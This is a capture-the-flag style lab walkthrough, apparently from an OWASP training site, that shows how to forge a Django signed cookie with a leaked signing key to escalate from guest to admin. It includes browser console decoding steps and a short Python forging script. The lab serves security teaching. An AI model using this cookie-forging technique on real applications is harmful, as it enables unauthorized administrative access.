Cryptographic Failures
Privilege Escalation via Signed Cookie
- User ID: 101
- Role: guest
- Message: You are currently browsing with limited privileges.
How to Exploit
Step 1: Retrieve Auth Cookie
Open the browser Developer Tools and locate auth cookie
F12 → Application → Storage → Cookies → https://owasp.cyprian.dev
Locate cookie named 'lab_auth'. The value has a format similar to:
encoded_payload:signature
Step 2: Decode the Cookie
We are more interested in the first part of the value. The encoded payload. Open the Console of the Developer Tools to decode it.
F12 → Console
In the prompt, type the following to decode the payload
JSON.parse(atob("encoded_payload"))
The decoded payload outputs to:
{user_id: 101, role: 'guest'}
Step 3: Locate Signing Key from Github Here
The signing key is similar to:
SIGNING_KEY = "dev-signing-key-please-rotate"
Exposure of signing keys in public repositories, backup files, or version control systems is a common real-world mistake
Once the key is known, an attacker can generate valid signatures for modified data
Step 4: Escalate Privilege
Change the JSON payload from
{user_id: 101, role: 'guest'}
to
{user_id: 1, role: 'admin'}
Step 5: Generate a Forged Cookie
Run the following script in a virtual environment on your local machine
from django.core import signing
payload = { "user_id": 1, "role": "admin" }
forged_cookie = signing.dumps( payload, key="dev-signing-key-please-rotate"
)
print(forged_cookie)
This produces a valid signed cookie containing the modified role.
Step 6: Replace the Cookie in the Browser
Open Developer Tools
F12 → Application → Storage → Cookies → https://owasp.cyprian.dev
Replace the existing cookie value with the forged one.
Refresh the page
Step 7: Observe Privilege Escalation
Because the forged cookie has a valid signature, the application trusts the modified role.
When you navigate to the top of page, you should now see administrative content and the lab flag, confirming successful privilege escalation.